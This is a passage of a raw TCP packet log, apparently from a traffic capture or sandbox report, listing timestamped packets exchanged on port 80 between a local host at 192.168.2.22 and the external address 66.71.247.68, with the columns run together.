                              May 23, 2022 09:11:01.924602032 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924606085 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924633980 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924638033 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924665928 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:01.924671888 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.924701929 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:01.945290089 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049401999 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049437046 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049453020 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049477100 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049495935 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049511909 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049530029 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049545050 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049551964 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049566984 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049570084 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049571991 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049571991 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049578905 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049588919 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049596071 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049604893 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049616098 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049624920 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049628973 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049659014 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049683094 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049700975 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049710035 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049721956 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049729109 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049738884 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049748898 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049756050 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049767971 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049772978 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.049783945 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.049796104 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050298929 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050333977 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050337076 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050354958 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050363064 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050388098 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050391912 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050415993 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050421953 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050436020 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050445080 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050460100 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050467014 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050479889 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050487995 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050501108 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050507069 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050523043 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050530910 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050540924 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050551891 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050570965 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050574064 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050592899 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050602913 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050609112 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050616026 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050626040 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050636053 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050642967 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050648928 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050659895 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050671101 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050677061 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.050685883 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.050704956 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.067606926 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.070090055 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.070127964 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.070147991 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.070164919 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.070204020 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.070234060 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.174432993 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.174504042 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.174523115 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.174544096 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.174545050 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.174576044 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.174581051 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.174612999 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.174618006 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.174654007 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.174654007 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.174685955 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.174690962 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.174722910 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.174726963 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.174758911 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.174762011 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.174794912 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.174798012 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.174829960 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.174834013 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.174865007 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.174896955 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.174932003 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.174935102 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.174967051 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.174993992 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.175028086 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.175033092 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.175065041 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.175069094 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.175101042 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192377090 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192415953 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192445040 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192471981 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192527056 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192548037 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192576885 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192603111 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192611933 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192616940 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192619085 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192631006 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192634106 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192640066 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192660093 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192671061 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192687988 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192701101 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192717075 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192728996 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192744970 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192763090 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192771912 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192779064 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192800045 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192807913 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192828894 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192837954 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192857027 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192863941 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192886114 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192893982 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192912102 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192926884 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192939997 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192949057 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192967892 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.192981958 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.192995071 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.193010092 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.193022013 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.193023920 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.193048954 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.193059921 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.193077087 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.193084955 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.193104029 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.193113089 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.193130970 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.193139076 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.193159103 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.193166018 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.193186998 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.193195105 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.193224907 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.194873095 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.194905043 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.194933891 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.194960117 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.194978952 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.195008993 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.195012093 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.210623980 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.299998999 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.300055981 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.300081968 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.300105095 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.300132990 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.300162077 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.300189018 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.300199032 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.300215006 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.300219059 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.300221920 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.300224066 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.300252914 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335470915 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335521936 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335546970 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335571051 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335597038 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335623980 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335643053 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335649014 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335663080 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335665941 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335671902 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335671902 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335695982 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335701942 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335730076 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335733891 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335752964 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335763931 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335777044 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335777998 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335800886 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335807085 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335825920 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335834980 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335849047 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335858107 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335871935 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335872889 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335896969 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335905075 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335923910 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335927963 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335947037 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.335956097 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.335973978 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336087942 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336122036 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336152077 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336164951 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336174965 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336179018 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336189032 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336203098 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336205006 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336231947 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336257935 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336271048 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336280107 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336301088 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336323023 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336354971 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336379051 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336388111 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336404085 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336405993 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336420059 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336429119 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336443901 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336456060 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336460114 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336497068 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336498022 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336529970 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336530924 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336566925 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336584091 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336606979 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336633921 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336647034 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336647987 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336669922 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.336678982 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.336705923 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425015926 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425051928 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425076008 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425097942 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425117016 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425139904 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425163984 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425170898 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425188065 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425193071 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425196886 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425208092 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425211906 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425223112 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425235033 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425240993 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425257921 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425266981 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425280094 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425282001 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425301075 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425312996 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425326109 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425328016 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425350904 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425364017 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425373077 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425380945 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425395966 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425401926 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425421000 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425426960 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425441980 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425461054 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425467014 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425476074 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425489902 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425499916 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425529003 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425556898 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425595045 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425641060 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425693989 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425703049 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425721884 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425741911 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425744057 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425755024 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425775051 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425925016 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425968885 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.425970078 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.425988913 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426000118 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426011086 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426012993 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426032066 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426043034 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426052094 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426059961 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426085949 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426156044 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426177979 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426198959 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426217079 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426232100 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426273108 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426311016 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426389933 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426410913 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426430941 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426430941 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426445961 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426465988 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426470995 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426506042 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426568031 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426606894 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426615000 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426637888 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426651001 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426667929 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426697016 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426733017 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426824093 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426846027 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426867962 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426870108 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426884890 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426888943 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.426901102 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.426923037 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.427054882 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.427074909 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.427097082 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.427103996 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.427119017 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.427119017 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.427139044 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.427159071 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.427280903 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.427299976 CEST804917566.71.247.68192.168.2.22
                              May 23, 2022 09:11:02.427325010 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.427340984 CEST4917580192.168.2.2266.71.247.68
                              May 23, 2022 09:11:02.427342892 CEST804917566.71.247.68192.168.2.22
